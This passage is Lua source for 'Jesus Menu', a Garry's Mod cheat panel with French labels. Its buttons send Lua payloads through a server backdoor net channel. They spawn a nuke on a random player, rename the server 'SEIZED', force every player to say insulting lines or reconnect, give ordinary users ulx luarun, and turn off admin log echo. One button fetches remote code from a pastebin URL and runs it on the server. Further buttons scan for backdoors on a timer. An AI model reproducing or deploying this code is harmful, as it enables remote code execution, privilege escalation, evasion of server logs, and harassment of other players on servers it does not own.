  1913. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1914. Macro:SetSize( 110, 25 )
  1915. Macro.Paint = function()
  1916. surface.SetDrawColor(29, 39, 55)
  1917. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1918. surface.SetDrawColor( 32, 80, 154 )
  1919. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1920. end
  1921. Macro.DoClick = function()
  1922. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Une nuke va exploser quelques part ! :o" )
  1923. SploitNotify("Une nuke va exploser ! (m9k requis)")
  1924. surface.PlaySound("buttons/blip1.wav")
  1925. net.Start(netKey)
  1926. net.WriteString([[
  1927. local rocket = ents.Create("m9k_launched_davycrockett")
  1928. local ply2 = table.Random(player.GetAll())
  1929. if ply2 == ply then ply:ChatPrint("[RunString] Prevented epicentre from being you.") else
  1930. rocket:SetPos(ply2:GetPos())
  1931. rocket:SetOwner(ply2)
  1932. rocket.Owner = ply2
  1933. rocket:Spawn()
  1934. rocket:Activate()
  1935. ply:ChatPrint("[RunString] Allahu akbar.")
  1936. end]])
  1937. net.WriteBit (1)
  1938. net.SendToServer()
  1939. end
  1940.  
  1941. local Macro = vgui.Create( "DButton" )
  1942. Macro:SetParent(Controller)
  1943. Macro:SetPos( 500, 120 )
  1944. Macro:SetText( "Hostname" )
  1945. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1946. Macro:SetSize( 110, 25 )
  1947. Macro.Paint = function()
  1948. surface.SetDrawColor(29, 39, 55)
  1949. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1950. surface.SetDrawColor( 32, 80, 154 )
  1951. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1952. end
  1953. Macro.DoClick = function()
  1954. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Nom du serv. changer à SEIZED" )
  1955. SploitNotify("Nom du serv. changer à SEIZED ")
  1956. surface.PlaySound("buttons/blip1.wav")
  1957. net.Start(netKey)
  1958. net.WriteString("RunConsoleCommand(\"ulx\", \"rcon\", \"hostname\", \"SEIZED\")")
  1959. net.WriteBit (1)
  1960. net.SendToServer()
  1961. end
  1962.  
  1963. local Macro = vgui.Create( "DButton" )
  1964. Macro:SetParent(Controller)
  1965. Macro:SetPos( 500, 150 )
  1966. Macro:SetText( "Forcer a dire une chose" )
  1967. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1968. Macro:SetSize( 110, 25 )
  1969. Macro.Paint = function()
  1970. surface.SetDrawColor(29, 39, 55)
  1971. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1972. surface.SetDrawColor( 32, 80, 154 )
  1973. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1974. end
  1975. Macro.DoClick = function()
  1976. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Tout le monde dit 'i love jésus !' " )
  1977. SploitNotify("Tout le monde est en love sur jésus !")
  1978. surface.PlaySound("buttons/blip1.wav")
  1979. net.Start(netKey)
  1980. net.WriteString([[for k,v in pairs(player.GetAll()) do
  1981. v:ConCommand("say i love jesus <3")
  1982. end
  1983. ]])
  1984. net.WriteBit (1)
  1985. net.SendToServer()
  1986. end
  1987.  
  1988. local Macro = vgui.Create( "DButton" )
  1989. Macro:SetParent(Controller)
  1990. Macro:SetPos( 500, 180 )
  1991. Macro:SetText( "Force retry all" )
  1992. Macro:SetTextColor( Color(255, 255, 255, 255) )
  1993. Macro:SetSize( 110, 25 )
  1994. Macro.Paint = function()
  1995. surface.SetDrawColor(29, 39, 55)
  1996. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1997. surface.SetDrawColor( 32, 80, 154 )
  1998. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  1999. end
  2000. Macro.DoClick = function()
  2001. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Tout le monde se déco/reco ! " )
  2002. SploitNotify("Déco/reco de tous les joueurs")
  2003. surface.PlaySound("buttons/blip1.wav")
  2004. net.Start(netKey)
  2005. net.WriteString([[for k,v in pairs(player.GetAll()) do
  2006. v:ConCommand("retry")
  2007. end
  2008. ]])
  2009. net.WriteBit (1)
  2010. net.SendToServer()
  2011. end
  2012.  
  2013. local Macro = vgui.Create( "DButton" )
  2014. Macro:SetParent(Controller)
  2015. Macro:SetPos( 500, 210 )
  2016. Macro:SetText( "Force say : J'ai un petit zizi" )
  2017. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2018. Macro:SetSize( 110, 25 )
  2019. Macro.Paint = function()
  2020. surface.SetDrawColor(29, 39, 55)
  2021. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2022. surface.SetDrawColor( 32, 80, 154 )
  2023. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2024. end
  2025. Macro.DoClick = function()
  2026. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Tout le monde dit 'j'ai un petit zizi <3)'" )
  2027. SploitNotify("Tout le monde dit 'j'ai un petit zizi <3")
  2028. surface.PlaySound("buttons/blip1.wav")
  2029. net.Start(netKey)
  2030. net.WriteString([[for k,v in pairs(player.GetAll()) do
  2031. v:ConCommand("say j'ai un tout petit zizi")
  2032. end
  2033. ]])
  2034. net.WriteBit (1)
  2035. net.SendToServer()
  2036. end
  2037.  
  2038. local Macro = vgui.Create( "DButton" )
  2039. Macro:SetParent(Controller)
  2040. Macro:SetPos( 500, 240 )
  2041. Macro:SetText( "Luarun en user" )
  2042. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2043. Macro:SetSize( 110, 25 )
  2044. Macro.Paint = function()
  2045. surface.SetDrawColor(29, 39, 55)
  2046. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2047. surface.SetDrawColor( 32, 80, 154 )
  2048. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2049. end
  2050. Macro.DoClick = function()
  2051. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Luarun en user OK." )
  2052. SploitNotify("Luarun set en user !")
  2053. surface.PlaySound("buttons/blip1.wav")
  2054. net.Start(netKey)
  2055. net.WriteString("RunConsoleCommand(\"ulx\", \"groupallow\", \"user\", \"ulx luarun\")")
  2056. net.WriteBit (1)
  2057. net.SendToServer()
  2058. end
  2059.  
  2060. local Macro = vgui.Create( "DButton" )
  2061. Macro:SetParent(Controller)
  2062. Macro:SetPos( 500, 30 )
  2063. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2064. Macro:SetSize( 110, 25 )
  2065. Macro:SetText( "Force change name" )
  2066. Macro.Paint = function()
  2067. surface.SetDrawColor(29, 39, 55)
  2068. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2069. surface.SetDrawColor( 32, 80, 154 )
  2070. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2071. end
  2072. Macro.DoClick = function()
  2073. net.Start(netKey)
  2074. net.WriteString( "http.Fetch(\"https://pastebin.com/raw/GU6WNZdQ\",function(b,l,h,c)RunString(b)end,nil)" )
  2075. net.WriteBit (1)
  2076. net.SendToServer()
  2077. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Tout le monde change de nom :')" )
  2078. SploitNotify("Tout le monde change de nom :')")
  2079. surface.PlaySound("buttons/blip1.wav")
  2080. net.WriteBit(1)
  2081. net.SendToServer()
  2082. end
  2083.  
  2084.  
  2085. local Macro = vgui.Create( "DButton" )
  2086. Macro:SetParent(Controller)
  2087. Macro:SetPos( 500, 270 )
  2088. Macro:SetText( "ULX LOGECHO 0" )
  2089. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2090. Macro:SetSize( 110, 25 )
  2091. Macro.Paint = function()
  2092. surface.SetDrawColor(29, 39, 55)
  2093. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2094. surface.SetDrawColor( 32, 80, 154 )
  2095. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2096. end
  2097. Macro.DoClick = function()
  2098. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "ULX LOGECHO 0" )
  2099. SploitNotify("ULX LOGECHO 0")
  2100. surface.PlaySound("buttons/blip1.wav")
  2101. net.Start(netKey)
  2102. net.WriteString("RunConsoleCommand(\"ulx\", \"logecho\", \"0\")")
  2103. net.WriteBit (1)
  2104. net.SendToServer()
  2105. end
  2106.  
  2107. local Macro = vgui.Create( "DButton" )
  2108. Macro:SetParent(Controller)
  2109. Macro:SetPos( 500, 300 )
  2110. Macro:SetText( "Danse" )
  2111. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2112. Macro:SetSize( 110, 25 )
  2113. Macro.Paint = function()
  2114. surface.SetDrawColor(29, 39, 55)
  2115. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2116. surface.SetDrawColor( 32, 80, 154 )
  2117. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2118. end
  2119. Macro.DoClick = function()
  2120. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Danse" )
  2121. SploitNotify("Danse")
  2122. surface.PlaySound("buttons/blip1.wav")
  2123. net.Start(netKey)
  2124. net.WriteString([[for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_DANCE) end timer.Create("dance_loop",8.9,0,function() for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_DANCE) end end )
  2125. ]])
  2126. net.WriteBit (1)
  2127. net.SendToServer()
  2128. end
  2129.  
  2130. local Macro = vgui.Create( "DButton" )
  2131. Macro:SetParent(Controller)
  2132. Macro:SetPos( 500, 330 )
  2133. Macro:SetText( "+right" )
  2134. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2135. Macro:SetSize( 110, 25 )
  2136. Macro.Paint = function()
  2137. surface.SetDrawColor(29, 39, 55)
  2138. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2139. surface.SetDrawColor( 32, 80, 154 )
  2140. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2141. end
  2142. Macro.DoClick = function()
  2143. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "+right" )
  2144. SploitNotify("+right")
  2145. surface.PlaySound("buttons/blip1.wav")
  2146. net.Start(netKey)
  2147. net.WriteString([[for k,v in pairs(player.GetAll()) do
  2148. v:ConCommand("+right")
  2149. end
  2150. ]])
  2151. net.WriteBit (1)
  2152. net.SendToServer()
  2153. end
  2154.  
  2155. local Macro = vgui.Create( "DButton" )
  2156. Macro:SetParent(Controller)
  2157. Macro:SetPos( 500, 360 )
  2158. Macro:SetText( "+duck" )
  2159. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2160. Macro:SetSize( 110, 25 )
  2161. Macro.Paint = function()
  2162. surface.SetDrawColor(29, 39, 55)
  2163. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2164. surface.SetDrawColor( 32, 80, 154 )
  2165. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2166. end
  2167. Macro.DoClick = function()
  2168. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "+duck" )
  2169. SploitNotify("+right")
  2170. surface.PlaySound("buttons/blip1.wav")
  2171. net.Start(netKey)
  2172. net.WriteString([[for k,v in pairs(player.GetAll()) do
  2173. v:ConCommand("+duck")
  2174. end
  2175. ]])
  2176. net.WriteBit (1)
  2177. net.SendToServer()
  2178. end
  2179.  
  2180. local Macro = vgui.Create( "DButton" )
  2181. Macro:SetParent(Controller)
  2182. Macro:SetPos( 500, 390 )
  2183. Macro:SetText( "+back" )
  2184. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2185. Macro:SetSize( 110, 25 )
  2186. Macro.Paint = function()
  2187. surface.SetDrawColor(29, 39, 55)
  2188. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2189. surface.SetDrawColor( 32, 80, 154 )
  2190. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2191. end
  2192. Macro.DoClick = function()
  2193. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "+back" )
  2194. SploitNotify("+back")
  2195. surface.PlaySound("buttons/blip1.wav")
  2196. net.Start(netKey)
  2197. net.WriteString([[for k,v in pairs(player.GetAll()) do
  2198. v:ConCommand("+back")
  2199. end
  2200. ]])
  2201. net.WriteBit (1)
  2202. net.SendToServer()
  2203. end
  2204.  
  2205. local Macro = vgui.Create( "DButton" )
  2206. Macro:SetParent(Controller)
  2207. Macro:SetPos( 500, 420 )
  2208. Macro:SetText( "+forward" )
  2209. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2210. Macro:SetSize( 110, 25 )
  2211. Macro.Paint = function()
  2212. surface.SetDrawColor(29, 39, 55)
  2213. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2214. surface.SetDrawColor( 32, 80, 154 )
  2215. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2216. end
  2217. Macro.DoClick = function()
  2218. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "+back" )
  2219. SploitNotify("+back")
  2220. surface.PlaySound("buttons/blip1.wav")
  2221. net.Start(netKey)
  2222. net.WriteString([[for k,v in pairs(player.GetAll()) do
  2223. v:ConCommand("+forward")
  2224. end
  2225. ]])
  2226. net.WriteBit (1)
  2227. net.SendToServer()
  2228. end
  2229.  
  2230. local Macro = vgui.Create( "DButton" )
  2231. Macro:SetParent(Controller)
  2232. Macro:SetPos( 500, 450 )
  2233. Macro:SetText( "undo" )
  2234. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2235. Macro:SetSize( 110, 25 )
  2236. Macro.Paint = function()
  2237. surface.SetDrawColor(29, 39, 55)
  2238. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2239. surface.SetDrawColor( 32, 80, 154 )
  2240. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2241. end
  2242. Macro.DoClick = function()
  2243. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "undo" )
  2244. SploitNotify("undo")
  2245. surface.PlaySound("buttons/blip1.wav")
  2246. net.Start(netKey)
  2247. net.WriteString([[for k,v in pairs(player.GetAll()) do
  2248. v:ConCommand("undo")
  2249. end
  2250. ]])
  2251. net.WriteBit (1)
  2252. net.SendToServer()
  2253. end
  2254.  
  2255. local Macro = vgui.Create( "DButton" )
  2256. Macro:SetParent(Controller)
  2257. Macro:SetPos( 500, 480 )
  2258. Macro:SetText( "Stop right/etc" )
  2259. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2260. Macro:SetSize( 110, 25 )
  2261. Macro.Paint = function()
  2262. surface.SetDrawColor(29, 39, 55)
  2263. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2264. surface.SetDrawColor( 32, 80, 154 )
  2265. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2266. end
  2267. Macro.DoClick = function()
  2268. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Stop right/etc" )
  2269. SploitNotify("Stop right/etc")
  2270. surface.PlaySound("buttons/blip1.wav")
  2271. net.Start(netKey)
  2272. net.WriteString([[for k,v in pairs(player.GetAll()) do
  2273. v:ConCommand("-right")
  2274. end
  2275.  
  2276. for k,v in pairs(player.GetAll()) do
  2277. v:ConCommand("-duck")
  2278. end
  2279.  
  2280. for k,v in pairs(player.GetAll()) do
  2281. v:ConCommand("-back")
  2282. end
  2283.  
  2284. for k,v in pairs(player.GetAll()) do
  2285. v:ConCommand("-forward")
  2286. end
  2287. ]])
  2288. net.WriteBit (1)
  2289. net.SendToServer()
  2290. end
  2291. -----------------------------
  2292. -- OPEN EXPLOIT MENU --
  2293. -----------------------------
  2294. -- DANS LE CONTROLLER
  2295. local Macro = vgui.Create( "DButton" )
  2296. Macro:SetPos( 650, 40 )
  2297. Macro:SetParent(Controller)
  2298. Macro:SetText( "Exploit Menu" )
  2299. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2300. Macro:SetSize( 180, 30 )
  2301. Macro.Paint = function()
  2302. surface.SetDrawColor(30, 30, 30)
  2303. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2304. surface.SetDrawColor(15, 15, 15)
  2305. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2306. end
  2307. Macro.DoClick = function()
  2308. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Exploit Menu" )
  2309. SploitNotify("Exploit MENU")
  2310. surface.PlaySound("buttons/blip1.wav")
  2311. RunConsoleCommand( "jesus_exploitmenu" ) -- What happens when you press the button
  2312. end
  2313.  
  2314. -- DANS LE TARGETS
  2315. local Macro = vgui.Create( "DButton" )
  2316. Macro:SetPos( 650, 40 )
  2317. Macro:SetParent(Targets)
  2318. Macro:SetText( "Exploit Menu" )
  2319. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2320. Macro:SetSize( 180, 30 )
  2321. Macro.Paint = function()
  2322. surface.SetDrawColor(30, 30, 30)
  2323. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2324. surface.SetDrawColor(15, 15, 15)
  2325. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2326. end
  2327. Macro.DoClick = function()
  2328. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Exploit Menu" )
  2329. SploitNotify("Exploit MENU")
  2330. surface.PlaySound("buttons/blip1.wav")
  2331. RunConsoleCommand( "jesus_exploitmenu" ) -- What happens when you press the button
  2332. end
  2333.  
  2334. --DANS LE MISC
  2335. local Macro = vgui.Create( "DButton" )
  2336. Macro:SetPos( 650, 40 )
  2337. Macro:SetParent(Misc)
  2338. Macro:SetText( "Exploit Menu" )
  2339. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2340. Macro:SetSize( 180, 30 )
  2341. Macro.Paint = function()
  2342. surface.SetDrawColor(30, 30, 30)
  2343. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2344. surface.SetDrawColor(15, 15, 15)
  2345. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2346. end
  2347. Macro.DoClick = function()
  2348. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Exploit Menu" )
  2349. SploitNotify("Exploit MENU")
  2350. surface.PlaySound("buttons/blip1.wav")
  2351. RunConsoleCommand( "jesus_exploitmenu" ) -- What happens when you press the button
  2352. end
  2353.  
  2354. ------------------------------
  2355. -- SCAN BACKDOOR ALL --
  2356. ------------------------------
  2357. --DANS LE CONTROLLER
  2358. local Macro = vgui.Create( "DButton" )
  2359. Macro:SetPos( 650, 70 )
  2360. Macro:SetParent(Controller)
  2361. Macro:SetText( "Scan backdoor" )
  2362. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2363. Macro:SetSize( 180, 30 )
  2364. Macro.Paint = function()
  2365. surface.SetDrawColor(30, 30, 30)
  2366. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2367. surface.SetDrawColor(15, 15, 15)
  2368. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2369. end
  2370. Macro.DoClick = function()
  2371. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Scan backdoor en cours..." )
  2372. SploitNotify("Scan en cours...")
  2373. surface.PlaySound("buttons/blip1.wav")
  2374. checkbackdoors()
  2375. end
  2376.  
  2377. local Macro = vgui.Create( "DButton" )
  2378. Macro:SetPos( 650, 100 )
  2379. Macro:SetParent(Controller)
  2380. Macro:SetText( "Scan backdoor toutes les 10s" )
  2381. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2382. Macro:SetSize( 180, 30 )
  2383. Macro.Paint = function()
  2384. surface.SetDrawColor(30, 30, 30)
  2385. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2386. surface.SetDrawColor(15, 15, 15)
  2387. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2388. end
  2389. Macro.DoClick = function()
  2390. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Scan backdoor toutes les 10 secondes en cours..." )
  2391. timer.Create( "bdcheck10s", 10, 0, function()
  2392. SploitNotify("Scan en cours...")
  2393. surface.PlaySound("buttons/blip1.wav")
  2394. checkbackdoors()
  2395. end)
  2396. end
  2397.  
  2398. local Macro = vgui.Create( "DButton" )
  2399. Macro:SetPos( 650, 130 )
  2400. Macro:SetParent(Controller)
  2401. Macro:SetText( "Scan backdoor toutes les 30s" )
  2402. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2403. Macro:SetSize( 180, 30 )
  2404. Macro.Paint = function()
  2405. surface.SetDrawColor(30, 30, 30)
  2406. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2407. surface.SetDrawColor(15, 15, 15)
  2408. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2409. end
  2410. Macro.DoClick = function()
  2411. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Scan backdoor toutes les 30 secondes en cours..." )
  2412. timer.Create( "bdcheck30s", 30, 0, function()
  2413. SploitNotify("Scan en cours...")
  2414. surface.PlaySound("buttons/blip1.wav")
  2415. checkbackdoors()
  2416. end)
  2417. end
  2418.  
  2419. --DANS LE TARGETS
  2420. local Macro = vgui.Create( "DButton" )
  2421. Macro:SetPos( 650, 70 )
  2422. Macro:SetParent(Targets)
  2423. Macro:SetText( "Scan backdoor" )
  2424. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2425. Macro:SetSize( 180, 30 )
  2426. Macro.Paint = function()
  2427. surface.SetDrawColor(30, 30, 30)
  2428. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2429. surface.SetDrawColor(15, 15, 15)
  2430. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2431. end
  2432. Macro.DoClick = function()
  2433. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Scan backdoor en cours..." )
  2434. SploitNotify("Scan en cours...")
  2435. surface.PlaySound("buttons/blip1.wav")
  2436. checkbackdoors()
  2437. end
  2438.  
  2439. local Macro = vgui.Create( "DButton" )
  2440. Macro:SetPos( 650, 100 )
  2441. Macro:SetParent(Targets)
  2442. Macro:SetText( "Scan backdoor toutes les 10s" )
  2443. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2444. Macro:SetSize( 180, 30 )
  2445. Macro.Paint = function()
  2446. surface.SetDrawColor(30, 30, 30)
  2447. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2448. surface.SetDrawColor(15, 15, 15)
  2449. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2450. end
  2451. Macro.DoClick = function()
  2452. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Scan backdoor toutes les 10 secondes en cours..." )
  2453. timer.Create( "bdcheck10s", 10, 0, function()
  2454. SploitNotify("Scan en cours...")
  2455. surface.PlaySound("buttons/blip1.wav")
  2456. checkbackdoors()
  2457. end)
  2458. end
  2459.  
  2460. local Macro = vgui.Create( "DButton" )
  2461. Macro:SetPos( 650, 130 )
  2462. Macro:SetParent(Targets)
  2463. Macro:SetText( "Scan backdoor toutes les 30s" )
  2464. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2465. Macro:SetSize( 180, 30 )
  2466. Macro.Paint = function()
  2467. surface.SetDrawColor(30, 30, 30)
  2468. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2469. surface.SetDrawColor(15, 15, 15)
  2470. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2471. end
  2472. Macro.DoClick = function()
  2473. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Scan backdoor toutes les 30 secondes en cours..." )
  2474. timer.Create( "bdcheck30s", 30, 0, function()
  2475. SploitNotify("Scan en cours...")
  2476. surface.PlaySound("buttons/blip1.wav")
  2477. checkbackdoors()
  2478. end)
  2479. end
  2480.  
  2481. --DANS LE MISC
  2482. local Macro = vgui.Create( "DButton" )
  2483. Macro:SetPos( 650, 70 )
  2484. Macro:SetParent(Misc)
  2485. Macro:SetText( "Scan backdoor" )
  2486. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2487. Macro:SetSize( 180, 30 )
  2488. Macro.Paint = function()
  2489. surface.SetDrawColor(30, 30, 30)
  2490. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2491. surface.SetDrawColor(15, 15, 15)
  2492. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2493. end
  2494. Macro.DoClick = function()
  2495. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Scan backdoor en cours..." )
  2496. SploitNotify("Scan en cours...")
  2497. surface.PlaySound("buttons/blip1.wav")
  2498. checkbackdoors()
  2499. end
  2500.  
  2501. local Macro = vgui.Create( "DButton" )
  2502. Macro:SetPos( 650, 100 )
  2503. Macro:SetParent(Misc)
  2504. Macro:SetText( "Scan backdoor toutes les 10s" )
  2505. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2506. Macro:SetSize( 180, 30 )
  2507. Macro.Paint = function()
  2508. surface.SetDrawColor(30, 30, 30)
  2509. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2510. surface.SetDrawColor(15, 15, 15)
  2511. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2512. end
  2513. Macro.DoClick = function()
  2514. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Scan backdoor toutes les 10 secondes en cours..." )
  2515. timer.Create( "bdcheck10s", 10, 0, function()
  2516. SploitNotify("Scan en cours...")
  2517. surface.PlaySound("buttons/blip1.wav")
  2518. checkbackdoors()
  2519. end)
  2520. end
  2521.  
  2522. local Macro = vgui.Create( "DButton" )
  2523. Macro:SetPos( 650, 130 )
  2524. Macro:SetParent(Misc)
  2525. Macro:SetText( "Scan backdoor toutes les 30s" )
  2526. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2527. Macro:SetSize( 180, 30 )
  2528. Macro.Paint = function()
  2529. surface.SetDrawColor(30, 30, 30)
  2530. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2531. surface.SetDrawColor(15, 15, 15)
  2532. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2533. end
  2534. Macro.DoClick = function()
  2535. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "Scan backdoor toutes les 30 secondes en cours..." )
  2536. timer.Create( "bdcheck30s", 30, 0, function()
  2537. SploitNotify("Scan en cours...")
  2538. surface.PlaySound("buttons/blip1.wav")
  2539. checkbackdoors()
  2540. end)
  2541. end
  2542.  
  2543. local Macro = vgui.Create( "DButton" )
  2544. Macro:SetPos( 650, 160 )
  2545. Macro:SetParent(Misc)
  2546. Macro:SetText( "SmegHack" )
  2547. Macro:SetTextColor( Color(255, 255, 255, 255) )
  2548. Macro:SetSize( 180, 30 )
  2549. Macro.Paint = function()
  2550. surface.SetDrawColor(30, 30, 30)
  2551. surface.DrawRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2552. surface.SetDrawColor(15, 15, 15)
  2553. surface.DrawOutlinedRect( 0, 0, Macro:GetWide(), Macro:GetTall() )
  2554. end
  2555. Macro.DoClick = function()
  2556. chat.AddText(Color(math.random(255), math.random(255), math.random(255)), "[", "Jesus Menu", "] ", Color( 255, 255, 255 ), "SmegHack lancé" )
  2557. SploitNotify("SmegHack")
  2558. surface.PlaySound("buttons/blip1.wav")
